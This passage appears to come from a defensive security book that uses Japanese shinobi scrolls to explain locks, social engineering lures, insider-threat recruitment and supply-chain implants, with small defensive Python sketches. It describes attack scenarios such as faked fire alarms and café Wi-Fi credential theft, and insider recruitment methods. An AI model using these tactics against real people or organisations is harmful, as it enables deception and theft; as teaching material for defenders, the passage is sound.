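            # Stage two: the key works only while the pins are unfrozen
            if self._unfrozen_at is None:
                return False
            return (time.monotonic() - self._unfrozen_at) <= self._window

    lock = TwoStageLock(pin="4721")  # hypothetical PIN
    lock.enter_pin("4721")
    print("door opens" if lock.turn_key() else "pins are frozen")

The design point the model captures is that the attacker must defeat both stages inside one short window, not each stage at leisure.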

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable assets inside. You know all your valuables are kept under lock and key—in chests and vaults, behind doors and gates—and you know a shinobi is capable of bypassing all these locks.

How could you bolster the security of your castle’s locks? Would you

know if your locks had been opened or bypassed? How might you block a

shinobi’s access to your locks? How could you configure false locks to trick a

shinobi and alert you to an infiltration attempt?

Recommended Security Controls and Mitigations

Where relevant, the recommendations are presented with applicable

security controls from the NIST 800-53 standard. Each should be evalu-

ated with the concept of locks in mind.

1. Secure paper files, magnetic tape, hard drives, flash drives, disks,

and other physical media in locked, controlled containers. [MP-

4: Media Storage; MP-5: Media Transport]

2. Use secure keys or other locking devices to enforce physical

access controls and authorization to systems and environments.

[PE-3: Physical Access Control | (1) Information System Access

| (2) Facility/Information System Boundaries | (4) Lockable

Casings | (5) Tamper Protection; PE-4: Access Control for

Transmission Medium; PE-5: Access Control for Output Devices]

Debrief

In this chapter, we talked about locks and their purposes. We noted that

adversaries, no matter the era, will develop tools and techniques to bypass


locks. We touched on the common lock technologies used to protect

access to systems and why it’s important to upgrade them. It’s especially

important to remember that, if an adversary gains physical access to your

system, you should assume they can compromise it—hence the impor-

tance of physically preventing access to those systems with locks.

In the next chapter, we will discuss an advanced tactic shinobi used

when the target was very securely locked down—one that effectively

tricked their adversary into giving away the key. In a way, an organiza-

tion’s defenses aren’t that different. Even if you have the best lock, if you

give the key to an intruder, it won’t help you.

12

MOON ON THE WATER

After making an agreement with your lord, you should lure

the enemy out with bait to infiltrate their defenses.

In this technique, you should lure the enemy with tempting bait,

like fishing in the sea or a river, so as to make an enemy who will

not normally come out in fact leave its defenses.

—Bansenshūkai, Yo-nin II 1

With an image straight out of a haiku, Bansenshūkai calls

an open-disguise infiltration technique suigetsu no jutsu—

the art of the “moon on the water.”2 While the technique

had many uses, shinobi used it primarily to target heavily

fortified enemy camps—the kind that restricted people

from leaving, entering, or even approaching. Instead of

penetrating the camp’s defenses by force, shinobi would

lure out their target, effectively tricking them into giving

away ingress protocols such as insignias and other identify-

ing marks, passwords, code words, and challenge-response


signals. This technique also let shinobi tail targets as they returned to

camp, lure defenders from their guard posts and infiltrate without resis-

tance, or interact directly with targets and infiltrate through deception or

offensive measures.

For targets especially reluctant to leave their heavily fortified defenses,

the scroll instructs shinobi to seek help from their commanders to conduct

advanced deceptions.3 For example, a commander could move forces into

vulnerable positions, enticing the enemy to attack and thereby depleting

the enemy’s defenses enough for shinobi to infiltrate. Alternatively, the

shinobi would overpower the enemy when they returned, battle weary.

The commander might even stage something more elaborate, like the

beginning of a full-on, long-term castle siege. Then, shinobi might send

a soldier posing as an allied general’s messenger to convince the enemy

to leave their castle,


join in a counteroffensive, and break the siege. To

complete the ruse, the shinobi commander would send a small force to

masquerade as allied reinforcements, both luring the target from their

encampment and allowing shinobi to infiltrate while the gates were open.

According to the scroll, after shinobi successfully infiltrated the tar-

get using suigetsu no jutsu, they had to keep these thoughts in mind:

• Remain calm. Do not appear lost.

• Mimic the people in the castle.

• Prioritize collecting code words, passwords, challenge responses,

and insignias.

• Signal to allies as soon as possible.4

In this chapter, we will explore the ways this ancient technique could

be deployed by a cyber threat actor and compare it to commonly used

social engineering tactics. We’ll introduce a way to think abstractly about

network communication signals as entering and/or leaving perimeters—

despite the computer system’s not physically moving—and detail concepts

for countering the moon on the water technique and social engineering

attacks in general. Lastly, we’ll attempt a thought exercise scenario that

mimics the conundrum ancient Japanese generals must have faced when

targeted by moon on the water.

Social Engineering

The shinobi moon on the water attack bears a striking similarity to today’s

social engineering attacks, which exploit a human target’s decision-making

processes and cognitive biases to manipulate them into revealing sensitive

information or performing self-defeating actions. In cybersecurity, most


social engineering tactics are used by adversaries operating inside enemy

territory to exploit the target’s trust. Examples of typical social engineer-

ing attacks include:

Phishing The adversary sends an email that convinces its recipients

to open a dangerous document or visit a malicious hyperlink, result-

ing in malware infection, ransomware execution, data theft, or other

attacks.

Pretexting The adversary calls or emails with invented scenarios

designed to convince a target to reveal sensitive information or per-

form malicious actions.

Baiting The adversary strategically plants malicious portable

media, such as a USB drive, in a physical location to entice the target

to pick it up and connect it to internal systems, creating an opening

for system compromise.

Social engineering is a particularly challenging security problem

because it exploits human nature in ways that technological controls can-

not always defend against. As targets and victims become more aware of

social engineering threats, many organizations lean on focused technical

controls, security protocols, and user education to protect their valuable

assets. Employees are trained in how to properly handle and care for

sensitive information and systems, while security teams document proce-

dures to verify the identity of unknown or unsolicited visitors and require

physical escorts for non-employees on company grounds. Red teams

conduct internal phishing and tailgating tests, among other exercises, to

gauge employee awareness of and instill resistance to social engineering

tactics. Administrators implement technical controls to block malicious

documents and hyperlinks, employ data loss prevention (DLP) software,

prevent unauthorized system changes, blacklist unregistered systems and

external media, and use caller ID.

While these are all good and necessary security measures, the way peo-

ple work has changed. And thinking around social engineering attacks has

not yet evolved to fully consider defending against moon on the water–style

attacks—the kind that attempt to lure the target outside its own defenses.

Today, things like bring your own device (BYOD) policies, full-time

remote work, and multitenant clouds make workers and organizations

more flexible. However, they also weaken traditionally strong perimeter

security architectures and expose employees to new social engineering

threats. For example, in most cases, stateful firewall rules do not permit

external (internet) communication to pass through the firewall to an

internal host. Instead, the firewall requires the internal (intranet) system


to initiate contact before it allows responses from the external system to

pass through to the internal host. So, while the internal host does not

physically leave the organization’s defenses, doing so virtually—say, by

visiting a malicious website—could allow threat actors to infiltrate within

the responding communications. Essentially, this is digital tailgating.
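A few lines of Python can model that stateful behavior. This is a simplified sketch, not how any particular firewall is implemented; the addresses and class names are invented for the example.

# Sketch of the stateful rule described above: inbound traffic passes
# only when it matches a connection an internal host initiated.

class StatefulFirewall:
    def __init__(self):
        self.state = set()  # (internal_host, external_host) pairs

    def outbound(self, internal, external):
        """An internal host initiates contact, creating state."""
        self.state.add((internal, external))

    def inbound_allowed(self, external, internal):
        """Responses pass only if the internal host reached out first."""
        return (internal, external) in self.state

fw = StatefulFirewall()

# Unsolicited inbound traffic is dropped ...
print(fw.inbound_allowed("evil.example", "10.0.0.5"))  # False

# ... but once the internal host "virtually leaves" by visiting the
# site, whatever rides back on the response channel is allowed in.
fw.outbound("10.0.0.5", "evil.example")
print(fw.inbound_allowed("evil.example", "10.0.0.5"))  # True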

In addition to directly compromising traditional security architectures,

threat actors could use a number of moon on the water–style techniques to

infiltrate heavily fortified organizations. Consider the following scenarios:

• An adversary triggers a fire alarm within a secure facility, causing

employees to exit en masse. While firefighters clear the building,

the adversary blends into the crowd of employees to steal or docu-

ment badges, keys, tokens, faces, fingerprints, and more. To ease

the flow of employees returning to work, the facility temporarily

turns off badge readers, turnstiles, or other physical access con-

trols, or security is so overwhelmed by the flood of people that

they don’t notice tailgating.

• An adversary uses a food truck to lure employees from a secure

facility. Because the employees approach the truck themselves, the

adversary is not the initiator of contact, which lowers suspicion; from

that footing, the adversary performs quid pro quo social engineering

on a target, eventually developing a rapport and convincing the target

to perform actions they would not in a traditional social engineering scenario.

• An adversary compromises the Wi-Fi network at a café across the

street from a business conference to steal the credentials of a

target organization’s employees. By entering the café with their

devices, those employees have left their organization’s defenses

and unknowingly exposed themselves to an environment con-

trolled by the adversary.

• An adversary conducts large-scale disruptive, denial, or destruc-

tive attacks against targeted people, systems, and data, prompt-

ing them to move to a less secure disaster recovery operation

site that is easier to infiltrate than the organization’s permanent

headquarters.

Note that while these attacks might not necessarily achieve an adver-

sary’s end goal, they could provide means or information that, in con-

junction with other exploits, accomplishes malicious objectives.

Defenses Against Social Engineering

Most organizations perform social engineering awareness training

and routinely run phishing tests against internal staff. While this strategy improves

resiliency to such attacks, a significant percentage of personnel always

fail. Unfortunately, most organizations leave staff vulnerable to social


engineering. We need to do more to give employees the tools they need

to guard against such deceptions.

1. Establish safeguards. Implement standard trust frameworks for

employees to reduce the risk of compromise by social engineer-

ing. Identify high-value targets in your environment, and then

establish security protocols, policies, and procedures for the

appropriate control and handling of sensitive information on

those systems (expand these to all systems over time). Conduct

training, awareness, and test exercises within your organization to

raise the level of employee awareness around social engineering,

along with iterative threat modeling to review and improve related

security controls.

2. Implement “slow thinking.” Distribute and discuss Daniel Kahneman’s

book Thinking, Fast and Slow5 with your security team. The book

describes two systems of thought: the quicker, more impulsive

“System 1” and the slower, more logical “System 2.” Develop solu-

tions that force your employees to slow down and think in System

2 terms, thereby avoiding the cognitive biases and shortcuts social

engineers most often exploit. Possible examples include:

• Configuring


your phone-switching system to require an

employee who receives an external call to punch in the even

digits of the caller’s phone number before the system can

connect.

• Configuring your mail client so that employees must type the

“from” email address backward before they can open exter-

nal email attachments.

• Requiring users visiting non-whitelisted URLs to correctly

enter the number of characters in the domain before the

browser performs a DNS query.

All these measures will slow down business operations, but

they also help mitigate social engineering attacks.
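As a sketch of what one such speed bump might look like, the following Python fragment implements the second idea from the list above: the user must retype the sender's address backward before an external attachment is released. The prompt flow and the sender address are hypothetical.

# "System 2" gate: force deliberate attention to the "from" address
# before an external attachment leaves quarantine.

def system2_gate(sender: str) -> bool:
    expected = sender[::-1]
    print(f"External attachment from: {sender}")
    answer = input("Type the sender's address BACKWARD to proceed: ")
    return answer == expected

if __name__ == "__main__":
    if system2_gate("payroll@evil-lookalike.example"):
        print("Attachment released from quarantine.")
    else:
        print("Mismatch. Attachment stays quarantined.")

Typing an address in reverse forces the user to read it character by character, which is precisely when a look-alike domain tends to get noticed.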

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. Your castle has been besieged, and you aren’t sure

whether you have enough food to keep your people fed. You receive a letter

from an allied general who says he will send you food and other provisions if

you can divert the attention of the enemy troops surrounding your castle at a

specific date and time . The letter asks that you send your second-in-command

to the allied general’s camp nearby to help plan a counteroffensive against

the siege.

How do you determine whether the letter is a ruse sent by the enemy?

Can you independently verify the letter’s authenticity? Assuming the letter is

legitimate, how would you lure away the attacking army? Finally, what pre-

cautions would you take to receive the supplies while preventing infiltration of

your own castle during the exchange?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of moon on the water in mind.

1. Because security systems and controls can protect information

only within established boundaries, implement safeguards that

stop information and systems from passing beyond those bound-

aries and falling into the hands of social engineers. [AC-3: Access

Enforcement | (9) Controlled Release; PE-3: Physical Access

Control | (2) Facility/Information System Boundaries; SC-7:

Boundary Protection]

2. Control your information flow so that even when data goes

beyond the normal protective boundaries, it is not allowed to

travel to or between unauthorized information systems. [AC-

4: Information Flow Enforcement; PL-8: Information Security

Architecture; SC-8: Transmission Confidentiality and Integrity]

3. For all non-local (that is, through a network) system mainte-

nance, establish approval protocols, require strong authenticators

and documented policies, and implement monitoring. [MA-4:

Nonlocal Maintenance]

4. Establish protections for data outside controlled areas and

restrict data-handling activities to authorized persons. [MP-5:

Media Transport | (1) Protection Outside Controlled Areas]


Debrief

In this chapter, we described the advanced shinobi technique of moon

on the water. We looked at various scenarios in which the moon on the

water technique could be modernized to target businesses. We explored

the challenges that social engineering presents and the various forms

it can take. We reviewed existing security practices designed to handle

social engineering and examined new defense concepts. And we lifted

a thought exercise from the shinobi scrolls to demonstrate how fragile

our trust model is and how hard it can be to safeguard against social

engineering.

In the next chapter, we will discuss insider threats—one of the

most fascinating topics in security. The shinobi scrolls provide detailed

instructions on how to identify people who could be recruited as insiders

with the help of some social engineering techniques—and they suggest

a way to defend against insider threats that is contrary to modern best

practices.

13

WORM AGENT

Make a minomushi, or worm agent

(aka insider threat), out of an enemy.

A minomushi is someone who serves the enemy but is made a

ninja working for your side. Thus the agent is exactly like a worm

in the enemy’s stomach, which eats its belly from the inside out.

—Bansenshūkai, Yo-nin I 1

Never short on evocative imagery, Bansenshūkai describes

an open-disguise infiltration technique called “the art

of a worm in your stomach” (or “worm agent”), which

calls for shinobi to recruit enemy insiders to perform

tasks on their behalf. Such recruitment took high emo-

tional intelligence. Shinobi had to choose an appropriate

target; engineer opportunities to approach the target;

and discreetly parse what the target thought about their

employer, personal worth, and secret ambitions.2 The

scroll warns that candidate selection must be undertaken


with extreme care, because attempting to recruit the wrong person to

become a worm agent—or minomushi—could seriously harm a shinobi’s

mission. To maximize their odds of successful recruitment, shinobi devel-

oped eight archetypes of likely worm agents:3

• Individuals who have been unfairly or excessively punished by

their current employer for prior offenses and who harbor deep-

seated bitterness as a result.

• People who, despite being born to privilege or having impressive

abilities, are employed beneath their station, have been passed

over for promotion, and resent being underutilized.

• Habitual overachievers who consistently deliver good results for

their employers but are rewarded with token titles, small bonuses,

or insufficient raises—or with nothing at all. Their contributions

minimized, they believe they might have had a more fruitful

career had they been hired by another employer. They further

believe their organization makes stupid decisions because leader-

ship values sycophants and politicians over loyal employees with

real accomplishments.

• Smart and talented workers who do not get along with leadership.

Because these people tend to garner disapproval easily and are

considered annoyances, their employers give them low-level posi-

tions, lay the groundwork for constructive dismissal, and generally

make them feel unwelcome.

• Experts in their field whose employers exploit their circum-

stances, such as loyalty oaths or family obligations, to keep them

in lower positions.

• Individuals whose job functions are in direct opposition to their

personal identity, family needs, or beliefs, leading them to regret

the work they do.

• Greedy and conniving people who lack loyalty or a moral

compass.

• “Black sheep” employees who have a bad reputation due to past

misdeeds and feel frustrated about their diminished status.

After a shinobi selected a potential minomushi, they created a plan

to become acquainted and build a relationship with the candidate.

Bansenshūkai instructs shinobi to present themselves as rich and curry

the target’s favor with money; use friendly banter to discern their likes,

beliefs, and sense of humor; and use light banter to surreptitiously dis-

cover their inner thoughts. If the target’s character aligned with a worm

agent archetype, then the shinobi attempted to exploit those minomushi


traits by promising wealth, recognition, and help with achieving their

secret ambitions—or, more directly, alcohol and sex—in exchange for

betraying their employer.4

Before exploiting the newly turned minomushi, shinobi were advised

to obtain an oath of betrayal, collect collateral assets to guarantee

the worm agent’s loyalty, and establish signals and other operational

security (OPSEC).5

In this chapter, we will review insider threats. We will compare and

contrast the disgruntled worker with the recruited insider threat. We will

also touch on the detection and deterrent methods that organizations

use to deal with insider threats, as well as a new, tailored approach—

inspired by the shinobi scrolls—to proactively prevent at-risk employees

from becoming insider threats. Lastly, a thought exercise will


ask you to

imagine which former and/or current employees could become insider

threats and to examine how you have interacted with them.

Insider Threats

An insider threat is an employee, user, or other internal resource whose

actions could harm an organization—whether intentionally or not.

Because they did not intend to perform malicious actions, a hapless

employee who opens a phishing email and infects their workstation with

malware is an unwitting insider threat. On the other hand, a disgruntled

worker who purposefully releases a virus into the organization, whether

for personal reasons or on behalf of an adversary, is an intentional insider

threat. Because insider threats are legitimate, authorized users with

authentication, privileges, and access to information systems and data,

they are some of cybersecurity’s most difficult problems to mitigate.

Many organizations rely on technical controls and threat hunters

for early detection of insider threats. Technical detection techniques—

things like behavior heuristics—can help identify potential insider

threats. Vigilant cyberdefenders and hunters may investigate users who

take uncharacteristic or inappropriate actions, including downloading

all files to external portable media, performing searches for sensitive or

proprietary data unrelated to their job, logging in to perform nonprior-

ity work on weekends or holidays, accessing honeypot systems and files

clearly labeled as restricted access, or downloading and using hacker-like

tools to perform actions outside their job functions.
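Hunt teams often operationalize such heuristics as a weighted score over user events. The following Python sketch is illustrative only; the event names, weights, and alert threshold are invented for the example, not drawn from any particular product.

from collections import defaultdict

# Toy behavior-heuristic scoring: weight each suspicious event type
# and flag users whose accumulated score crosses a threshold.
WEIGHTS = {
    "bulk_copy_to_usb": 5,
    "sensitive_search_outside_role": 3,
    "weekend_login_nonpriority": 2,
    "honeypot_file_access": 8,
    "hacker_tool_execution": 6,
}
ALERT_THRESHOLD = 10

def score_events(events):
    """events: iterable of (username, event_type) tuples."""
    scores = defaultdict(int)
    for user, event_type in events:
        scores[user] += WEIGHTS.get(event_type, 0)
    return {user: s for user, s in scores.items() if s >= ALERT_THRESHOLD}

log = [
    ("alice", "weekend_login_nonpriority"),
    ("bob", "bulk_copy_to_usb"),
    ("bob", "honeypot_file_access"),
    ("carol", "sensitive_search_outside_role"),
]
print(score_events(log))  # {'bob': 13} -> worth a closer look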

But technical controls are only part of a solid defense strategy,

even for mature organizations. By checking references; performing

background checks, including of criminal and financial history; and


screening for drug use, the employer can verify that employees are not

plainly vulnerable to undue influence. The human resources function

plays a key role in identifying potential insider threats. Some human

resources departments conduct annual employee surveys to identify

potential issues, and others terminate at-risk employees proactively or

recommend rescinding certain access privileges based on troublesome

findings. Unfortunately, it is common for organizations to exercise mini-

mal precautions. Most trust their employees, others ignore the issue, and

still others accept the risk of insider threats so business operations can

run smoothly.

Entities that fight insider threats more aggressively, such as organiza-

tions in the defense industry and the intelligence community, implement

advanced detection and prevention measures such as polygraphs, routine

clearance checks, counterintelligence programs, compartmentalization,

and severe legal penalties—not to mention cutting-edge technical con-

trols. However, even these controls cannot guarantee that the malicious

actions of all insider threats—especially those assisted by sophisticated

adversaries—will be detected and prevented. They also present unique

implementation and operational challenges.

A New Approach to Insider Threats

Organizations that focus their efforts on scrutinizing employees and

attempting to catch them in the act are waiting too long to address the

threat. A more proactive approach is to foster a work environment that

doesn’t create the conditions in which insider threats thrive. Some of the

following suggestions are tailored to remediating specific insider threat

archetypes.

1. Develop detection and mitigation techniques. Examine the products and

technical controls your organization uses to identify and mitigate

internal threats. Run staff training and awareness sessions, review

security incident reports, and perform red team exercises such

as phishing tests to identify repeat unintentional insider threats.

Then train, warn, and mitigate these individuals by implementing

additional security controls on their accounts, systems, privileges,

and access. For example, your security team could restrict staff

members’ ability and opportunity to perform insider threat actions

with strict controls and policies. Some examples include:

• Enforce a policy that macros cannot be enabled or executed

on systems.


• Configure all emails to arrive in plaintext with hyperlinks

disabled.

• Quarantine all external email attachments by default.

• Disable web browsing, or make it available only through an

isolated internet system that is not connected to your organi-

zation’s intranet.

• Disable USB ports and external media drives on certain

systems.
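As an illustration of two of these controls, the following Python sketch uses the standard library's email module to deliver only a message's plaintext body and to hold attachments from external senders. The internal-domain check and the quarantine action are simplifications for the example.

from email import policy
from email.parser import BytesParser

INTERNAL_DOMAINS = {"example.com"}  # hypothetical internal domain

def filter_message(raw_bytes: bytes):
    """Return the plaintext body plus a list of attachments to hold."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    sender = msg.get("From", "")
    external = not any(domain in sender for domain in INTERNAL_DOMAINS)

    held = []
    for part in msg.walk():
        if external and part.get_content_disposition() == "attachment":
            held.append(part.get_filename())

    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body else ""
    return text, held

raw = (b"From: vendor@supplier.example\r\n"
       b"Subject: Invoice\r\n"
       b"Content-Type: text/plain\r\n\r\n"
       b"Please see attached.\r\n")
print(filter_message(raw))  # ('Please see attached.\n', [])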

Monitoring intentional insider threats requires both advanced

detection techniques and technologies capable of deception and

secrecy. Select these based on appropriate organizational threat

modeling and risk assessments.

2. Implement human resource–based anti-minomushi policies. After the

previous technical controls and detection techniques have been

implemented and tested, address personnel controls. Ensure

that human resources maintains records on current employees,

previous employees, and candidates that include indicators of

minomushi profiles. Ask pointed questions during candidate

screening, performance reviews, and exit interviews to capture

these diagnostics.

3. Take special care to prevent the circumstances that create minomushi

employees. Your human resources team should consider the fol-

lowing organization-wide policies, presented in order of the

eight minomushi archetypes:

• Review employee disciplinary protocols to prevent unfair

or excessive punishment—real or perceived—of employees.

Require that employees and applicants disclose whether they

have family members who have worked for your organization.

Encourage human resources to gauge whether employees

think the disciplinary actions against them are unfair or

excessive, and then work together to find solutions that will

mitigate employee animosity.

• Regularly distribute employee surveys to gauge morale and

identify underutilized talent in lower-ranking employees.

Conduct transparent interviews with employees and man-

agement to determine whether: an employee is ready for a

promotion, has gone unrecognized for recent achievements,

or needs to grow a specific skill set; the company has a role to

promote them into or budget to offer them a raise; or certain


employees perceive themselves to be better or more valuable

than their colleagues—and whether a reality check is neces-

sary. Working with management, consider how to alleviate

employee bitterness and how to correct perceptions that the

organization is not a meritocracy.

• As part of performance reviews, solicit feedback from col-

leagues to identify managers whom lower-ranking employees

consider most valuable, as well as which employees believe

they have not received appropriate recognition. Address

these grievances with rewards and/or visibility into the com-

pany’s leadership decisions.

• Encourage leadership to personally coach smart but socially

awkward workers, discreetly letting them know how they are

perceived, with the goal of helping these employees feel more

socially accepted and less isolated.

• Review and eliminate company policies that hold back top

talent. These may include noncompete agreements, unfair

appropriation of employees’ intellectual property, and insuf-

ficient performance bonuses or retention incentives. While

designed to protect the company, these policies may have the

opposite effect.

• Conduct open source profiling of current employees and

applicants to determine whether they have publicly expressed

strong feelings about or have a conflict of interest in the mis-

sion of your organization. If so, reassign those employees to

positions where they will feel more alignment between their

personal values and the work they do or ease their departure

from the organization.

• Develop character-profiling techniques to look for indica-

tors that employees


and applicants may be susceptible to

bribery. Consider reducing system access and privilege levels

for these employees, thereby reducing their usefulness to an

adversary.

Work closely with employees at high risk for minomushi condi-

tions. Give them extra resources, time, and motivation to move

past whatever grudges they may hold, seize opportunities for

personal growth, and develop self-respect. Minimize or halt orga-

nizational actions that reinforce bad memories or continue to

punish an employee for past misdeeds.


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable information, treasure, and people inside. You receive credible threat

intelligence that a shinobi plans to recruit someone within your castle to use

their trust and access against you. You receive a list of eight different types of

people likely to be recruited. It’s unclear who specifically is being targeted or

what the shinobi’s objectives are.

Whom would you first suspect as an insider threat? Why is that person

in a vulnerable state, and how could you remediate the situation? How would

you detect the recruitment of one of your subjects or catch the recruiter in

the act? How might you place guards to prevent insider threat actions? How

could you train your subjects to report insider threats without causing every-

one to turn on each other? How long should you maintain this insider threat

program?

To avoid the political pitfalls of conducting this as a group exercise at

your current workplace, consider building and using a list of former employ-

ees. If you can perform this exercise discreetly with a small group of stake-

holders, consider both former and current employees.

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of recruited insider threats in mind. (For more information,

see PM-12: Insider Threat Program.)

1. Have the SOC work privately with human resources to correlate

information on potential insider threats who display minomushi

characteristics. The SOC should more closely monitor, audit,

and restrict these high-risk individuals. It can also work with

human resources to establish insider threat honeypots—for

example, files in network shares that say “RESTRICTED DO

NOT OPEN”—that identify employees who perform actions con-

sistent with insider threats; a minimal watcher sketch follows this list. [AC-2: Account Management | (13)

Disable Accounts for High-Risk Individuals; AU-6: Audit Review,

Analysis, and Reporting | (9) Correlation with Information from

Nontechnical Sources; SC-26: Honeypots]

2. Use your own account to perform insider threat actions (without

red team capabilities) on files and systems you know will not harm


your organization. Actions could include modifying or delet-

ing data, inserting fake data, or stealing data. Document which

systems and data your account can access, then use a privileged

account such as admin or root to conduct malicious privileged

actions. For example, you could create a new admin user with

an employee name that does not exist. Ask whether your SOC

can discover what data you stole, deleted, or modified within a

specific date range to test whether your SOC can properly audit

the privileged actions you performed. [AC-6: Least Privilege | (9)

Auditing Use of Privileged Functions; CA-2: Security Assessments |

(2) Specialized Assessments]

3. Train your employees to recognize minomushi characteristics

and insider threat behavior. Enable employees to easily and

anonymously report potential minomushi conditions with respect

to suspected insider threats, similar to how they report phish-

ing scams. Conduct insider threat awareness exercises as part of

regular security training. [AT-2: Security Awareness | (2) Insider

Threat]
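A minimal sketch of the honeypot idea in item 1 follows. It simply polls the access times of decoy files; a production deployment would instead use OS audit facilities or EDR telemetry, and note that access times are often not updated on network shares mounted with noatime. The paths and interval are hypothetical.

import os
import time

DECOYS = ["/shares/finance/RESTRICTED_DO_NOT_OPEN.xlsx"]

def watch(decoys, interval=10):
    """Alert whenever a decoy file's access time changes."""
    last_seen = {p: os.stat(p).st_atime for p in decoys if os.path.exists(p)}
    while True:
        for path, atime in list(last_seen.items()):
            current = os.stat(path).st_atime
            if current != atime:
                print(f"ALERT: decoy {path} was accessed")
                last_seen[path] = current
        time.sleep(interval)

# watch(DECOYS)  # run under an account with read access to the shares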

Debrief

In this chapter, we reviewed the shinobi technique of recruiting vulner-

able people inside a target organization to perform malicious actions.

We detailed the eight insider threat candidate archetypes and discussed

the various types of insider threat detection and protection programs

currently used by organizations. We described a new defensive approach

based on information from the shinobi scrolls—one that uses empathy

toward the disgruntled employee. The thought exercise in this chapter

challenges participants to evaluate not only potential insiders but also

their own actions toward coworkers; it encourages them to think about

taking a more cooperative approach to potential insider threats.

In the next chapter, we will discuss long-term insiders: employees

recruited by an adversary before they joined your organization. And,

since long-term insiders intentionally hide any resentment or malice

toward the organization, detecting them is even more problematic.

14

GHOST ON THE MOON

According to Japanese legend, if you knew how to seek the

ghost who tends trees on the moon, he could invite you to the

moon to eat the leaves of his tree, making you invisible.

In normal times, before the need arises, you should find someone

as an undercover agent who will become the betrayer, an enemy

you plant and thus make a ninja of him and have him within

the enemy castle, camp or vassalage, exactly as the ghost in the

legend, Katsuraotoko, is stationed on the moon.

—Bansenshūkai, Yo-nin I 1

As part of its array of sophisticated infiltration techniques,

the Bansenshūkai describes a long-term open-disguise tac-

tic called “ghost on the moon.” This tactic was designed

to acquire privileged information and access through a

planted secret agent. First, a shinobi recruits a person who

is trustworthy, smart, wise, courageous, and loyal. Or, if

the recruit is not loyal to begin with, the scroll suggests

taking their family members hostage for the duration of


the mission to make them “loyal.” Then, the shinobi plants the agent in a

foreign province or castle. There, they will spend years working earnestly

with the target to build up their reputation, connections, knowledge, and

access. Ideally, the plant will be working closely with enemy leadership.

The mole must always maintain plausible, reliable, and conspicuous means

of contact with the shinobi. If this enemy stronghold ever becomes a target

for attack, the shinobi handler can call on the undercover agent for high-

confidence intelligence, insider assistance, sabotage, and offensive actions

against the enemy, including assassination.2 And while the ghost on the

moon gambit took years to pay off, to patient and tactful shinobi, the

reward was worth the time investment.

In this chapter, we will look at the ghost on the moon as a type

of insider threat. It can help to think of hunting for hardware implants, by way

of analogy, as trying to find ghosts on the moon with a telescope. For that

reason, we’ll cover the subject of implants, supply chain security, and

covert hardware backdoors. We will also compare the characteristics of

a ghost on the moon plant with ideal hardware implants. We’ll touch on

supply chain risk management and threat-hunting strategies, with the

caveat that underlying issues make this threat nearly impossible to fully

defend against.

Implants

Corporate espionage and nation-state spy activities historically have

relied on strategically placed agents to accomplish specific long-term

missions. Today, technology offers newer and cheaper ways to get

the results that have traditionally been possible only with human

actors. For example, suppose your organization bought and installed

a foreign-manufactured router on its network years ago, and it has

functioned perfectly. But, unbeknownst to your security team, an

adversary has just activated a hidden implant installed at the factory,

providing direct, unfiltered backdoor access to your most sensitive sys-


tems and data.

The cybersecurity industry classifies this kind of attack as a supply

chain attack. Here, supply chain refers to the products and services asso-

ciated with an organization’s business activities or systems; examples

include hardware, software, and cloud hosting. In the previous example,

the router performs the necessary business activity of moving digital

information over the network to conduct ecommerce.

While heuristics or threat hunting can detect abnormal router behav-

ior, there is no foolproof way to defend against covert implants. Some

organizations may use quality assurance representatives to monitor man-

ufacturing, but they cannot ensure that every system is built correctly.


However, several cybersecurity best practices can mitigate a router-based

supply chain attack. A proactive organization could:

1. Perform a threat analysis of all router manufacturers and then

use the results to acquire a router less likely to ship with compro-

mised hardware or software

2. Employ a trusted, secure shipping service and procure chain of

custody for the router to prevent malicious interception

3. Conduct forensic inspection of the router upon delivery to

validate that it has not been compromised or altered from the

expected specifications

4. Secure the router with tamper protections and detection tech-

nologies to identify and mitigate unauthorized alterations

Note that these steps are not limited to routers. Organizations can

take these precautions on every service, device, system, component, and

software application in their supply chain.
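As a concrete illustration of step 3, the following Python sketch hashes a delivered firmware image and compares it against a digest the vendor published out of band. The filename and the expected digest are placeholders; the approach assumes you trust the out-of-band channel more than the shipped device.

import hashlib

EXPECTED_SHA256 = "<vendor-published digest goes here>"

def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_firmware(path: str) -> bool:
    digest = sha256_of(path)
    if digest != EXPECTED_SHA256:
        print(f"MISMATCH: {path} -> {digest}")
        return False
    return True

# verify_firmware("router_fw_v2.1.bin")  # hypothetical image name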

Covert implants are as valuable to modern nation-states as they were

to shinobi, because the need to discover and defend against them poses

difficult, long-term organizational challenges. Cybersecurity profession-

als continually test new concepts to address those challenges. For exam-

ple, an organization can restrict trust and access to all systems under the

assumption that they have already been compromised. However, the sig-

nificant impact they have on business operations renders many of these

concepts a practical impossibility.

Protections from Implants

Organizations attempting to weigh or x-ray every system to find some-

thing out of place will likely find themselves lost in the process of try-

ing to manage their supply chain. What’s more, advanced threat actors

capable of supply chain compromises are likely to embed malicious func-

tions in the default design of the system. In this way, only they know the

secret to enabling the implant, and it exists in every system. And while an

organization’s inspection process may be able to see a threat, it might not

understand what it’s looking at. That is the scale of the problem—it’s like

trying to find a ghost on the moon. That said, guidance for protecting

your organization from these implants is as follows:

1. Identify supply chain attack conditions. Create a list of components in

your supply chain that have ghost on the moon potential. Include

elements that:

• Are considered high trust


• Can communicate

• Can provide lateral or direct access to sensitive information

or systems

• Are not easily inspected

• Are not regularly replaced or updated

Specifically, look at software and hardware that communicates

with external systems or exerts control over systems that can

perform signal or communication functions (such as firmware

on routers, network interface cards [NICs], and VPN concentra-

tors). An implant can also exist as a hardware device, such as an

extremely thin metal interface placed inside the PCI interface

socket to act as a man-in-the-middle against the NIC, altering the

data flow, integrity, confidentiality, and availability of network

communications for that interface.

Imagine what your antivirus, hypervisor, vulnerability scanner,

or forensic analyst cannot inspect or test in your environment. A

key feature of ghost on the moon supply chain candidates is their

ability to persist in the target’s environment, which likely requires

